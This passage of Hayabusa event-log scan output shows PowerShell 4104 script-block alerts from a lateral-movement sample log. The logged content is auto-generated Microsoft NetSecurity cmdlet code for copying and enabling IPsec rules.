($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 
'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewP",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and 
config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"olicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"olicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown 
